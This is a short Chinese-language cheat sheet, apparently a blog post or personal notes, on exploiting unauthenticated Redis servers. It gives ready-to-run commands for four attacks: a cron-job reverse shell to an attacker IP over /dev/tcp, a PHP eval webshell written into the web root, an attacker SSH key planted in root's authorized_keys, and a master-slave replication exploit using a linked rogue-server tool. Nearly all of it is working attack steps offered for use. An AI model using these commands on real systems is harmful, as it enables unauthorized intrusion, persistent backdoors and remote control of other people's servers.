未授权无需认证访问内部数据库。
利用计划任务反弹shell
1 2 3 4 5 | redis-cli -h 192.168.2.6set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"config set dir /var/spool/cron/config set dbfilename rootsave |
获取webshell
1 2 3 4 | config set dir /var/www/html/config set dbfilename shell.phpset x "<?php @eval($_POST['test']);?>"save |
写入公钥远程连接
利用条件:root用户,未授权访问,开启ssh服务
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | 1. 事先先准备好自己的公钥,写入一个本地文件foo.txt。$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt2. 通过redis将该文件写入内存$ redis-cli -h 192.168.1.11 flushall$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit3. 利用redis-cli 写入配置的方式将公钥写入到.ssh目录下$ redis-cli -h 192.168.1.11192.168.1.11:6379> config set dir /Users/antirez/.ssh/OK192.168.1.11:6379> config get dir1) "dir"2) "/Users/antirez/.ssh"192.168.1.11:6379> config set dbfilename "authorized_keys"OK192.168.1.11:6379> saveOK4.公钥登陆ssh -i redis.pub root@192.168.192.133 |
主从复制漏洞:
paper:https://paper.seebug.org/975/
漏洞利用exp:
github:https://github.com/AdministratorGithub/redis-rogue-server
1 | python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port> |
